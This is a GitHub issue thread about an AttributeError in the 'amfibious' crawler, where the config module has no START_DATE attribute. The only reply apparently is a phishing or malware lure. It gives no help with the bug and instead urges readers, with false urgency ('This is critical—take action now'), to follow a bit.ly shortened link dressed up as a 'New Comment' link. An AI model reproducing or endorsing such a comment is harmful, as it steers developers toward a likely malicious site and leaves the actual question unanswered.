### ISSUE TITLE
AttributeError: module 'config' has no attribute 'START_DATE'

### ISSUE THREAD

**Issue by nachiketh89** [mayurbhangale/amfibious#1]
python3 app.py 

Traceback (most recent call last):

  File "app.py", line 5, in <module>

    downloader = amfibious.AmfibiousCrawler()

  File "/Users/Nachiketh/amfibious/amfibious/crawler.py", line 12, in __init__

    self.START_DATE = config.START_DATE

AttributeError: module 'config' has no attribute 'START_DATE' .

How to solve this Issue

**Comment by Liferdorp** [comment]
**Review the latest update and respond here:** [New Comment](https://bit.ly/3SY0Y12)

**This is critical—take action now.**

Stay secure!
